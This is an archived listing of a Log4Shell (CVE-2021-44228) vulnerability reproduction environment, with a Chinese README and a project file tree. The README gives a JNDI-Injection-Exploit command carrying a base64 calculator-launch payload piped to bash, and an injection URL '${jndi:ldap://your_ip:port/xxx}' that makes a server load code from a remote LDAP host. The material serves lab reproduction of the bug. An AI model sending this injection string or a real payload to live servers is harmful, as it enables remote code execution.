Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

Source
https://github.com/x1ongsec/CVE-2021-44228-Log4j-JNDI
Associated Vulnerability
Title:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
CVE-2021-44228 Vulnerability Reproduction Environment CVE-2021-44228 漏洞复现环境
Readme
## 访问
项目启动之后访问: http://127.0.0.1:9090/vul 

## 漏洞复现
JDK 版本:java8u92 (避免使用过高的版本,建议同我一致,高版本对JNDI注入有一定限制)

```bash
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
```

使用以上工具生成PAYLOAD。

访问 http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx}
File Snapshot

 [4.0K]  /data/pocs/3ef940c1b1d54fe4b907e0059caf390aa3a3bb80
├── [3.1K]  pom.xml
├── [ 455]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  qwesec
        │           ├── [4.0K]  controller
        │           │   └── [ 746]  VulController.java
        │           └── [ 319]  Log4jDemoApplication.java
        └── [4.0K]  resources
            ├── [  48]  application.properties
            └── [4.0K]  static
                └── [ 103]  index.html

8 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.